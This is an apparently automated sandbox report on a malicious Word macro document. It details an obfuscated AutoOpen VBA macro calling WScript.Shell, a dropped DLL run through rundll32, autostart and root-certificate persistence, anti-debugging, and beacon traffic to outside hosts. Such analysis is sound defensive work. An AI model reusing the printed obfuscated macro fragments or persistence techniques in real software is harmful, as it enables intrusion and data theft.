Analysis Report

Overview

General Information

Joe Sandbox Version:	16.0.0
Analysis ID:	162804
Start time:	12:41:52
Joe Sandbox Product:	Cloud
Start date:	07.09.2016
Overall analysis duration:	0h 10m 41s
Report type:	full
Sample file name:	ms.doc
Cookbook file name:	defaultwindowsdocumentcookbook.jbs
Analysis system description:	Windows 7 (Office 2016 v15, Java 1.8.71, Flash 20.0.0.286, Acrobat Reader 11.0.14, Internet Explorer 11, Chrome 48, Firefox 44)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Detection:	MAL
Classification:	mal88.evad.expl.winDOC@5/9@9/3
HCA Information:	Successful, ratio: 97% Number of executed functions: 37 Number of non-executed functions: 109
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 7.3% (good quality ratio 5.5%) Quality average: 62.3% Quality standard deviation: 40.8%
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): slui.exe, WatAdminSvc.exe Report size exceeded maximum capacity and may have missing behavior information. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	88	0 - 100	Report FP / FN

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine

Signature Overview

Click to jump to signature section

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00234160 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,DeleteDC,CreateCompatibleBitmap,SelectObject,BitBlt,DeleteObject,DeleteDC,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GdipDisposeImage,

4_2_00234160

Software Vulnerablities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: www.diefenbachgymnasium.at

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.22:49207 -> 85.90.53.159:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.22:49206 -> 176.9.16.213:80

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe

Document exploit detected (dops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: azgyrfhy.dat.2644.dr

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file://
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/ms.docdt
Source: WINWORD.EXE	String found in binary or memory: file:///c:/ms.docjt
Source: WINWORD.EXE	String found in binary or memory: file:///c:/ms.docpt
Source: WINWORD.EXE	String found in binary or memory: ftp://
Source: WINWORD.EXE	String found in binary or memory: http://
Source: rundll32.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: rundll32.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: rundll32.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: rundll32.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: rundll32.exe	String found in binary or memory: http://crl.usertrust.com/u$
Source: rundll32.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: rundll32.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: rundll32.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://fontfabrik.comq
Source: rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: WINWORD.EXE	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: WINWORD.EXE	String found in binary or memory: http://revereprotosvc11.cloudapp.net/api/v1.0/documents/d
Source: WINWORD.EXE	String found in binary or memory: http://s
Source: WINWORD.EXE	String found in binary or memory: http://schemas.openxm
Source: WINWORD.EXE	String found in binary or memory: http://www.ascendercorp.com/
Source: WINWORD.EXE	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: WINWORD.EXE	String found in binary or memory: http://www.bethmardutho.org.p
Source: WINWORD.EXE	String found in binary or memory: http://www.c-and-g.co.jp
Source: rundll32.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE, ms.doc	String found in binary or memory: http://www.eurasiagroup.net
Source: WINWORD.EXE, ms.doc	String found in binary or memory: http://www.eurasiagroup.net/
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: WINWORD.EXE	String found in binary or memory: http://www.fonts.com
Source: WINWORD.EXE	String found in binary or memory: http://www.founder.com.cn/cn
Source: WINWORD.EXE	String found in binary or memory: http://www.founder.com.cn/cn/
Source: WINWORD.EXE	String found in binary or memory: http://www.galapagosdesign.com/
Source: WINWORD.EXE	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: WINWORD.EXE	String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: rundll32.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: rundll32.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE	String found in binary or memory: http://www.sakkal.com
Source: WINWORD.EXE	String found in binary or memory: http://www.sandoll.co.kr
Source: WINWORD.EXE	String found in binary or memory: http://www.tiro.com;copyright
Source: WINWORD.EXE	String found in binary or memory: http://www.typography.netd
Source: WINWORD.EXE	String found in binary or memory: http://www.urwpp.de
Source: rundll32.exe	String found in binary or memory: http://www.usertrust.com1
Source: WINWORD.EXE	String found in binary or memory: http://www.zhongyicts.com.cn
Source: WINWORD.EXE	String found in binary or memory: https://
Source: WINWORD.EXE, rundll32.exe	String found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.compath=c:
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.com
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules=
Source: rundll32.exe	String found in binary or memory: https://nexusrules.officeapps.live.comao~_
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.comau
Source: rundll32.exe	String found in binary or memory: https://secure.comodo.com/cps0
Source: ms.doc	String found in binary or memory: https://www.eurasiagroup.net/sitefiles/issues/1512_top_risks_2016.pdf
Source: rundll32.exe	String found in binary or memory: https://www.multipassplus.eu/includes/search/?category=u0odkth8cc7yqom&id=ogx4m&searchword=oj2qv2ms&

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\paula\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /sites/all/themes/diefenbach/small_logo.png HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Host: www.diefenbachgymnasium.at
Source: global traffic	HTTP traffic detected: GET /includes/search/?password=0SOCGHJLpGg&done=y&fail=19UUQb&category=Oruw&name=qY&email=%2BOT91&q=FPt32HbS%2F&url=4pP&psw=xT&lang=fG83ZMW%2Fa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6Host: www.multipassplus.eu
Source: global traffic	HTTP traffic detected: GET /includes/search/?category=u0ODktH8cC7yQOM&id=oGx4m&searchword=oj2qV2Ms&text=XMY&submit=O4&searchphrase=LnXrH&action=nr&lang=JiEvjCy5%2FSX&content=%2B3Rw%2BxtvHqboJ21ZZ9nohLN&search=v&find=f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6Host: www.multipassplus.eu

Found strings which match to known social media urls

Show sources

Source: rundll32.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: rundll32.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE, ms.doc	String found in binary or memory: www.facebook.com/eurasiagroup equals www.facebook.com (Facebook)
Source: rundll32.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.diefenbachgymnasium.at

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /sites/all/themes/diefenbach/small_logo.png HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Host: www.diefenbachgymnasium.at
Source: global traffic	HTTP traffic detected: GET /includes/search/?password=0SOCGHJLpGg&done=y&fail=19UUQb&category=Oruw&name=qY&email=%2BOT91&q=FPt32HbS%2F&url=4pP&psw=xT&lang=fG83ZMW%2Fa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6Host: www.multipassplus.eu
Source: global traffic	HTTP traffic detected: GET /includes/search/?category=u0ODktH8cC7yQOM&id=oGx4m&searchword=oj2qV2Ms&text=XMY&submit=O4&searchphrase=LnXrH&action=nr&lang=JiEvjCy5%2FSX&content=%2B3Rw%2BxtvHqboJ21ZZ9nohLN&search=v&find=f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6Host: www.multipassplus.eu

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run AdobeAIR
Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run AdobeAIR

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\rundll32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\rundll32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_63C0724C LoadLibraryA,GetProcAddress,

4_2_63C0724C

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_0022FE00 push ecx; mov dword ptr [esp], 0023C3C6h

4_2_00230A51

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: ms.doc

Stream path 'Macros/VBA/Module1' : High number of string operations

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	3_2_5ADE1F27
Source: C:\Windows\System32\rundll32.exe	Code function: 3_1_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	3_1_5ADE1F27
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	4_2_5ADE1F27
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_002315D0 calloc,calloc,calloc,wcscmp,free,GetFileAttributesW,memset,FindFirstFileW,FindNextFileW,FindNextFileW,wcscmp,wcscmp,memset,RemoveDirectoryW,free,free,FindClose,memset,memset,FindNextFileW,memset,memset,free,free,free,free,GetLastError,memset,memset,free,free,	4_2_002315D0

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\AppV\Subsystem\Disabled

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\VFS\SystemX86\MSVCR100.dll

Classification label

Show sources

Source: classification engine

Classification label: mal88.evad.expl.winDOC@5/9@9/3

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00230A70 GetTickCount,GetCurrentThread,GetCurrentThread,OpenThreadToken,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,

4_2_00230A70

Contains functionality to check free disk space

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00232347 GetDriveTypeW,GetVolumeInformationW,GetDiskFreeSpaceExW,calloc,GetLastError,realloc,free,free,

4_2_00232347

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00232740 lstrcmpW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,calloc,CloseHandle,calloc,free,calloc,free,Process32NextW,OpenProcess,GetModuleFileNameExW,GetLastError,GetModuleHandleW,GetProcAddress,

4_2_00232740

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_63C07EC0 VirtualAlloc,VirtualAlloc,memcpy,memcpy,GetProcessHeap,HeapAlloc,GetVersionExA,HeapAlloc,memcpy,wcslen,wcslen,HeapAlloc,GetProcessHeap,memcpy,wcsrchr,wcscat,wcscat,FindResourceA,CreateActCtxA,ActivateActCtx,LoadLibraryA,GetProcAddress,VirtualFree,FindResourceA,HeapAlloc,VirtualAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,memcpy,HeapAlloc,VirtualProtect,

4_2_63C07EC0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\paula\AppData\Roaming\Microsoft\Office\Recent\ms.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\paula\AppData\Local\Temp\{BFBD2DB4-9BD0-4724-B1EB-854281D81301} - OProcSessId.dat

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: ms.doc

OLE indicator, Word Document stream: true

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Runs a DLL by calling functions

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\rundll32.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\paula\AppData\Roaming\Adobe\AIR\azgyrfhy.dat #2

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Document contains embedded VBA macros

Show sources

Source: ms.doc

OLE indicator, VBA macros: true

Document contains summary information with irregular field values

Show sources

Source: ms.doc

OLE document summary: edited time not present or 0

Reads the hosts file

Show sources

Source: C:\Windows\System32\rundll32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\System32\rundll32.exe	Section loaded: api-ms-win-core-localization-l1-2-1.dll

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: ms.doc	OLE, VBA macro line: Private Sub xyyac_DocumentBeforeClose(ByVal rbgsls As Document, ualysqs As Boolean)
Source: ms.doc	OLE, VBA macro line: Sub AutoOpen()

Document contains an embedded VBA macro which may execute processes

Show sources

Source: ms.doc	OLE, VBA macro line: Dim afpkh: Set afpkh = CreateObject("WScript.Shell")
Source: ms.doc	OLE, VBA macro line: Set zjctpculj = afpkh.Exec(pedugbr(Array((3254 - 3110), (4629 - 4478), (4958 - 4818), 134, (1841 - 1699), (6400 - 6258), 209, 208, (9750 - 9546), 135, (-6845 + 6999), (3153 - 3018), 194), (-6002 + 6228)) + pedugbr(Array((8843 - 8640), 175, (1586 - 1396), (-9167 + 9357 ), (6597 - 6427), (4000 - 3825), (-8157 + 8343), (1910 - 1735), (9203 - 9000), (-8029 + 8207), (3029 - 2854), (-7305 + 7443), (1029 - 900), 140, (7722 - 7583), (3774 - 3596), (-7170 + 7345), (4812 - 4645), (3540 - 3352), 178, (-6374 + 6517), (929 - 781), (-775 + 912), (5871 - 5720 ), (6327 - 6171), (1749 - 1613), (1999 - 1865), (-1096 + 1247), (3123 - 2931), 138, (-183 + 326), (1789 - 1635)), 238) + pedugbr(Array( (-2831 + 2912), (2796 - 2703), (-2647 + 2741), (4801 - 4722)), (8907 - 8782)))
Source: ms.doc	OLE, VBA macro line: Set cthuqwm = zkceh.ExecQuery(pedugbr(Array((10013 - 9986), (4134 - 4089), (-415 + 451), (-4851 + 4896), (204 - 161), (8501 - 8441), (2769 - 2665), 98, (-1185 + 1289), (-5786 + 5832), (6383 - 6325), 39, (-4903 + 4940), (4483 - 4379), 31, (-9398 + 9431), (6987 - 6949), 123 , (-7042 + 7164), (6619 - 6596), (-908 + 919), 39, (-6582 + 6619), (-876 + 932), (-4150 + 4211), (-3660 + 3720), (6300 - 6255), (-6192 + 6250 ), 27, 49, (4595 - 4536), (-4543 + 4603), (1631 - 1586), (-4276 + 4313)), (-653 + 725)))
Source: ms.doc	OLE, VBA macro line: Set wtdex = zkceh.ExecQuery(pedugbr(Array(180, (3942 - 3780), (-494 + 665), (-4464 + 4626), (8783 - 8619), 179, 199, (5283 - 5078), (-2505 + 2704), (9239 - 9078), 181, 168, 170, (8648 - 8449), 176, (-6616 + 6758), (2223 - 2086), (-6323 + 6535), (2121 - 1908), 184, ( 4726 - 4561), (6427 - 6253), (9729 - 9561), (-2858 + 3038)), 231))
Source: ms.doc	OLE, VBA macro line: Set wtdex = zkceh.ExecQuery(pedugbr(Array((-7516 + 7663), 133, 140, 133, (8988 - 8857), (-1650 + 1798), 224, (1229 - 995), (3887 - 3663), 134, (-2002 + 2148), (3422 - 3279), (-2946 + 3087), (-1048 + 1272), (-7646 + 7797), (-3480 + 3649), (4512 - 4338), 243, (6995 - 6753 ), 159, (-2154 + 2298), (9402 - 9228), (-7392 + 7536), 133, (-6452 + 6626), (-996 + 1176), (4258 - 4089), (-1287 + 1467), (-7463 + 7648)) , (4193 - 4001)))

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: ms.doc	OLE, VBA macro line: 'WScript.StdOut.Write kdpcjemqh
Source: ms.doc	OLE, VBA macro line: Set byfivenf = CreateObject("Scripting.FileSystemObject")
Source: ms.doc	OLE, VBA macro line: Dim afpkh: Set afpkh = CreateObject("WScript.Shell")
Source: ms.doc	OLE, VBA macro line: Dim afpkh: Set afpkh = CreateObject("WScript.Shell")
Source: ms.doc	OLE, VBA macro line: bupvupdyu = afpkh.ExpandEnvironmentStrings(pedugbr(Array(240, (8405 - 8257), (-8353 + 8486), (4508 - 4375), (-4516 + 4661), (8215 - 8067), (-221 + 350), (-8839 + 8987), (2865 - 2625), (5557 - 5420), 148, (-8210 + 8387), (-3782 + 3968), (-9105 + 9288), (-8111 + 8287), 137, 148, (2515 - 2359), (5998 - 5863), 137, (-37 + 217), 175, 178, (-5460 + 5632), (-7127 + 7294), (-4668 + 4847), 189, (332 - 160), ( -9117 + 9368), (-446 + 623), (2217 - 2037), (4051 - 3890)), (9832 - 9619)))
Source: ms.doc	OLE, VBA macro line: Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)
Source: ms.doc	OLE, VBA macro line: Set scgzdrkmc = byfivenf.CreateTextFile(bupvupdyu)

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program Manager
Source: rundll32.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_5ADE2580 #2,GetTickCount,Sleep,GetTickCount,SetUnhandledExceptionFilter,GetModuleFileNameW,SHGetSpecialFolderPathW,lstrlenW,PathRemoveExtensionW,lstrlenW,VirtualAlloc,GetProcAddress,GetModuleHandleA,#1,CreateThread,WaitForSingleObject,GetModuleFileNameA,wsprintfA,WinExec,	3_2_5ADE2580
Source: C:\Windows\System32\rundll32.exe	Code function: 3_1_5ADE2580 #2,GetTickCount,Sleep,GetTickCount,SetUnhandledExceptionFilter,GetModuleFileNameW,SHGetSpecialFolderPathW,lstrlenW,PathRemoveExtensionW,lstrlenW,VirtualAlloc,GetProcAddress,GetModuleHandleA,#1,CreateThread,WaitForSingleObject,GetModuleFileNameA,wsprintfA,WinExec,	3_1_5ADE2580
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_5ADE2580 #2,GetTickCount,Sleep,GetTickCount,SetUnhandledExceptionFilter,GetModuleFileNameW,SHGetSpecialFolderPathW,lstrlenW,PathRemoveExtensionW,lstrlenW,VirtualAlloc,GetProcAddress,GetModuleHandleA,#1,CreateThread,WaitForSingleObject,GetModuleFileNameA,wsprintfA,WinExec,	4_2_5ADE2580
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_5ADE2570 GetTickCount,Sleep,GetTickCount,SetUnhandledExceptionFilter,GetModuleFileNameW,SHGetSpecialFolderPathW,lstrlenW,PathRemoveExtensionW,lstrlenW,	4_2_5ADE2570
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_5ADE256D GetTickCount,Sleep,GetTickCount,SetUnhandledExceptionFilter,GetModuleFileNameW,SHGetSpecialFolderPathW,lstrlenW,PathRemoveExtensionW,lstrlenW,	4_2_5ADE256D
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_63C07590 SetUnhandledExceptionFilter,SetLastError,GetLastError,VirtualAlloc,memset,malloc,memcmp,free,malloc,free,CreateThread,ResumeThread,Sleep,WaitForMultipleObjects,CloseHandle,VirtualFree,VirtualFree,free,VirtualAlloc,memcpy,VirtualFree,WaitForMultipleObjects,ExitProcess,	4_2_63C07590
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_63C13870 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	4_2_63C13870
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_63C1386C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	4_2_63C1386C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00221179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,	4_2_00221179
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_002357F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	4_2_002357F0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_002357EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	4_2_002357EC

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\rundll32.exe

System information queried: KernelDebuggerInformation

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_63C0724C LoadLibraryA,GetProcAddress,

4_2_63C0724C

Contains functionality to read the PEB

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_63C07EC0 mov eax, dword ptr fs:[00000030h]		4_2_63C07EC0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_63C07F07 mov eax, dword ptr fs:[00000030h]		4_2_63C07F07

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Windows\System32\rundll32.exe

4_2_63C07EC0

Enables debug privileges

Show sources

Source: C:\Windows\System32\rundll32.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_5ADE1F27 SHGetSpecialFolderPathW,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,StrStrIW,SetCurrentDirectoryW,CreateFileW,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,FindNextFileW,FindClose,SetCurrentDirectoryW,	3_2_5ADE1F27
